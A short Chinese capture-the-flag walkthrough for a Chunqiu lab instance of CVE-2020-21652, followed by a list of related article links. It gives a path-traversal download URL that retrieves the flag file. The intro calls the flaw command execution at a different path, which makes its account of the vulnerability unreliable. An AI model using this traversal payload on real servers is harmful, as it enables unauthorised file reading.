春秋云境CVE-2020-21652(极速版)

1.阅读靶场介绍

这里可以得到的有用信息就是

路径:admin.php/point/addqq

方法:存在任意命令执行漏洞

2.启动靶场

我们会得到一个如下的页面

接下来我们直接上poc,访问这个路径

eci-2zegea1j3i7cgoqtc8q8.cloudeci1.ichunqiu.com:80/index.php/bbs/index/download?url=../../../../flag&local=1&name

我们就能下载flag了

到此又要恭喜各位博主攻克一个靶场了

感谢你们宝贵的时间

期待博主攻克任何靶场的话,欢迎留言

相关推荐
JAVA面经实录9171 天前
操作系统面试题
java·服务器·数据库·计算机网络·面试
楠目1 天前
Nginx 解析漏洞利用总结
nginx·网络安全
zyplayer-doc1 天前
企业知识库安全与权限管理完全指南:从加密到审计的六层防护
人工智能·安全·pdf·编辑器·创业创新
天天讯通1 天前
OKCC 呼叫中心安全性能全解析:技术防护与管理措施指南
大数据·开发语言·网络·人工智能·安全·语音识别
志栋智能1 天前
超自动化运维如何提升安全合规水平?
运维·安全·自动化
JAVA面经实录9171 天前
操作系统(面试全覆盖)
java·计算机网络·面试
IT新视界1 天前
星环科技ArgoDB:基于一体化架构构建数据全生命周期安全底座
数据库·科技·安全·架构
woniu_buhui_fei1 天前
HTTP协议及其工作原理
网络安全
TechWayfarer1 天前
查IP归属地接入实战:保险理赔如何做动态风险监控与预警
网络·python·tcp/ip·安全·flask
Hello:CodeWorld2 天前
【C++ 避坑指南】告别缓冲区溢出!全面解析 std::snprintf 的安全美学与核心陷阱
开发语言·c++·安全